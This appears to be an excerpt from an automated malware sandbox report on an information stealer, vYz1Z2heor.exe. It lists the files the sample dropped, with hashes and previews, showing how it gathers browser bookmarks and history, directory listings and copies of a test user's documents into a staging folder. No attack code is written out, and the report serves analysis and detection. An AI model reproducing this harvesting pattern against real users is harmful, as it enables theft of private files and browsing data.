                                                            SHA-256:B7DA80468862EDC06DB6D39F44C714C669F0B2B60407D4177D8DF60C84BDECA4
                                                            SHA-512:44398D5AC56B65BA2E59184E6A57ACDDE8C10BB21ED3BF5170BC2E99845BA01EFEE59B0B43D8BA9F4BB5EFDE0453720A22FF58FF089F4BF3BAAB0857440B34EF
                                                            Malicious:false
                                                            Preview:PK.........M.Y................Browsers\Edge\PK.........M.Y................Browsers\Google\PK.........(.YQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK.........(.Yc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.*3''QA..L#.....J_...\/.".._........_....1M_S....PK.........(.Y^.......5.......Directories\Desktop.txte..N.0...g.4Q......kKm...m..q...^....w='..;........[....K...f...v..5.WL.F!_..gM.*+0.k.]p..;-yI.z.gG.l.By..w....X".N....)D3.UqlUx....hyV......k.*.t.4...?.5xAyU.(WQ9...l...XN-f.......3.K..2.:t.?.M_@...P......Emw..`}0>........q........E....PK.........(.Y9..%............Directories\Documents.txtmR.n.0.<S.../._@lp.0/c((......T..&IC..g......S..q8<?.DJ..mn..- *..)+.qB=?.Q_.ifO....=..w.8..`..~f....X...._4.S.xB:~....[SFY..v....3..3.w..o.4T..T.....j..SP..tR.>.>6.t.D]].xUn..*...K...*U7.3.K..6`2c.10.J.X......%.0...o.Y~.%A...........Q.f^........-@.P.......r.....

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Browsers\Firefox\Bookmarks.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):105
                                                            Entropy (8bit):3.8863455911790052
                                                            Encrypted:false
                                                            SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                            MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                            SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                            SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                            SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                            Malicious:false
                                                            Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Browsers\Firefox\History.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-8 text
                                                            Category:dropped
                                                            Size (bytes):94
                                                            Entropy (8bit):4.886397362842801
                                                            Encrypted:false
                                                            SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                            MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                            SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                            SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                            SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                            Malicious:false
                                                            Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Directories\Desktop.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):565
                                                            Entropy (8bit):5.263142154940491
                                                            Encrypted:false
                                                            SSDEEP:12:wvTj4VjWi/O+F8/VjKb6dl1AbALKpjYejKy/dIy/D/MPDOlb:CEROJXEbXNY8XFIyjMPDOlb
                                                            MD5:4DDB7297D80BFCC588C29E5850D8E43A
                                                            SHA1:2BEA7960EAE2FABB914C880FE49A83F05688E307
                                                            SHA-256:9C76D7DCD18008DFBA8921600ED1A1A8DDE431994775BA1D168C92DA586E07CB
                                                            SHA-512:13B7E7861574ADDE713FD0C573CBEA0878B025E6EBAE3E0D501ABF14DAB8E0EA45740B8BFA03D991B2A7CE71CCDC1CCE853ED6C777C478258BA016A0940D6ED9
                                                            Malicious:false
                                                            Preview:Desktop\...DUUDTUBZFW\....DUUDTUBZFW.docx....EWZCVGNOWT.pdf....JDDHMPCDUJ.png....KLIZUSIQEN.jpg....NYMMPCEIMA.mp3....ZGGKNSUKOP.xlsx...GIGIYTFFYT\...GLTYDMDUST\...KLIZUSIQEN\...NWCXBPIUYI\...PALRGUCVEH\....DUUDTUBZFW.xlsx....EIVQSAOTAQ.png....EOWRVPQCCS.pdf....EWZCVGNOWT.mp3....PALRGUCVEH.docx....ZGGKNSUKOP.jpg...desktop.ini...DUUDTUBZFW.docx...DUUDTUBZFW.xlsx...EIVQSAOTAQ.png...EOWRVPQCCS.pdf...EWZCVGNOWT.mp3...EWZCVGNOWT.pdf...Excel.lnk...JDDHMPCDUJ.png...KLIZUSIQEN.jpg...NYMMPCEIMA.mp3...PALRGUCVEH.docx...vYz1Z2heor.exe...ZGGKNSUKOP.jpg...ZGGKNSUKOP.xlsx..

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Directories\Documents.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):690
                                                            Entropy (8bit):5.343010195212258
                                                            Encrypted:false
                                                            SSDEEP:12:QVj4VjWi/O+FdPLKQ4wRLKTLKBLKMkLKV/VjKb6dl1AbALKpjYejKy/dIy/D/llb:QJEROxxrqEETXEbXNY8XFIyjllb
                                                            MD5:0A76925D624332C8FECC8A1D4CA7A027
                                                            SHA1:60206C224FE9EA68C353CC2E8930B9A5D60165B2
                                                            SHA-256:13DDD8403B644B0E4F6F34C01DB9AF654996F67E64290526689CD423A5D1666B
                                                            SHA-512:40974137B7785F8D3F3998593780976F29080EB3C18AD926AEBF1D73877CD2639621C4CD7E1E7DFF5B89016F53267D116317E91DBD9953A867B7B7A778A38715
                                                            Malicious:false
                                                            Preview:Documents\...DUUDTUBZFW\....DUUDTUBZFW.docx....EWZCVGNOWT.pdf....JDDHMPCDUJ.png....KLIZUSIQEN.jpg....NYMMPCEIMA.mp3....ZGGKNSUKOP.xlsx...GIGIYTFFYT\...GLTYDMDUST\...KLIZUSIQEN\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NWCXBPIUYI\...PALRGUCVEH\....DUUDTUBZFW.xlsx....EIVQSAOTAQ.png....EOWRVPQCCS.pdf....EWZCVGNOWT.mp3....PALRGUCVEH.docx....ZGGKNSUKOP.jpg...desktop.ini...DUUDTUBZFW.docx...DUUDTUBZFW.xlsx...EIVQSAOTAQ.png...EOWRVPQCCS.pdf...EWZCVGNOWT.mp3...EWZCVGNOWT.pdf...JDDHMPCDUJ.png...KLIZUSIQEN.jpg...NYMMPCEIMA.mp3...PALRGUCVEH.docx...ZGGKNSUKOP.jpg...ZGGKNSUKOP.xlsx..

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Directories\Downloads.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):234
                                                            Entropy (8bit):5.2549380936207095
                                                            Encrypted:false
                                                            SSDEEP:6:3tSLKIajYbaj8jsB/cssI/wy/EI/To0kCOCc1G5bLv:QLKpjYejKy/dIy/D/llb
                                                            MD5:5E7E7A6E9D045EA64E4184ED2F45AEB8
                                                            SHA1:C0787510C1AAAFF729321A2FB3AD94B79E27E819
                                                            SHA-256:BB7D2D140CE09BB80DA52A9A7B1B3FABABDC795D6FF485751E64BD17250E021C
                                                            SHA-512:172747E7766052958DFB00C552AB9BABECBF73589F4CC8F21FB951F08404D2399652B7E6EBD0209C52F83942A97E9608A78BD44E8DE5A9F7CAC9DE12823C9C83
                                                            Malicious:false
                                                            Preview:Downloads\...desktop.ini...DUUDTUBZFW.docx...DUUDTUBZFW.xlsx...EIVQSAOTAQ.png...EOWRVPQCCS.pdf...EWZCVGNOWT.mp3...EWZCVGNOWT.pdf...JDDHMPCDUJ.png...KLIZUSIQEN.jpg...NYMMPCEIMA.mp3...PALRGUCVEH.docx...ZGGKNSUKOP.jpg...ZGGKNSUKOP.xlsx..

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Directories\OneDrive.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.023465189601646
                                                            Encrypted:false
                                                            SSDEEP:3:1hiR8LKB:14R8LKB
                                                            MD5:966247EB3EE749E21597D73C4176BD52
                                                            SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                            SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                            SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                            Malicious:false
                                                            Preview:OneDrive\...desktop.ini..

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Directories\Pictures.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):88
                                                            Entropy (8bit):4.450045114302317
                                                            Encrypted:false
                                                            SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                            MD5:D430E8A326E3D75F5E49C40C111646E7
                                                            SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                            SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                            SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                            Malicious:false
                                                            Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Directories\Startup.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):24
                                                            Entropy (8bit):4.053508854797679
                                                            Encrypted:false
                                                            SSDEEP:3:jgBLKB:j4LKB
                                                            MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                            SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                            SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                            SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                            Malicious:false
                                                            Preview:Startup\...desktop.ini..

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Directories\Temp.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4021
                                                            Entropy (8bit):5.208664393002513
                                                            Encrypted:false
                                                            SSDEEP:96:48fB3crOBE0RlE+Q74yMjL9lMaRDUnCw9KGV7GDnpKVkYh8lsV:fB/wafD5hdKYsV
                                                            MD5:318399BAB482DDE1C819ABB339F7CD0A
                                                            SHA1:0DF7522A7D23846F95E2C11A263C527FC81CB3D7
                                                            SHA-256:2D4D8CC2B40D52321EE0621199774BD4864AD2211AFEFB19C103178D1348C082
                                                            SHA-512:8065CDB19F8524C4C22E14BE69463083641978517B730FBD853FAA444D5556776D113A7766A103B09C5CCDABD46465F469737E5B2A571A3A9125F34874332EA4
                                                            Malicious:false
                                                            Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 12-30-24-218.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 12-30-37-144.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696501296901617700_E285B920-83FB-469F-8AC0-93210F7C82AA.log.....App1696501320899113200_1A06D4BB-DFF8-4391-B9AB-F88623A7807A.log.....App1696501329408245700_8059F11D-A631-42CB-859E-D78FC666AD16.log.....App1696501329408544000_8059F11D-A631-42CB-859E-D78FC666AD16.log...edge_BITS_5132_79551310\....4b56c463-a134-44ca-a2a6-86fef3e940d0...edge_BITS_6096_1007533999\....2132f61f-f790-4ae6-a355-8cf9a1533800...edge_BITS_6096_1016618583\....873489b1-33b2-480a-baa2-641b9e09edcd...edge_BITS_6096_1077744702\....9e51170b-7adf-40ab-83b6-5f97b13bedcb...edge_BITS_6096_1080361660\....c78f9967-7a8c-44b0-ad94-732b63c89638...edge

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Directories\Videos.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):23
                                                            Entropy (8bit):3.7950885863977324
                                                            Encrypted:false
                                                            SSDEEP:3:k+JrLKB:k+JrLKB
                                                            MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                            SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                            SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                            SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                            Malicious:false
                                                            Preview:Videos\...desktop.ini..

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW.docx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW.xlsx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW\DUUDTUBZFW.docx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW\EWZCVGNOWT.pdf

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.690071120548773
                                                            Encrypted:false
                                                            SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                            MD5:8F49644C9029260CF4D4802C90BA5CED
                                                            SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                            SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                            SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                            Malicious:false
                                                            Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW\JDDHMPCDUJ.png

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.687055908915499
                                                            Encrypted:false
                                                            SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                            MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                            SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                            SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                            SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                            Malicious:false
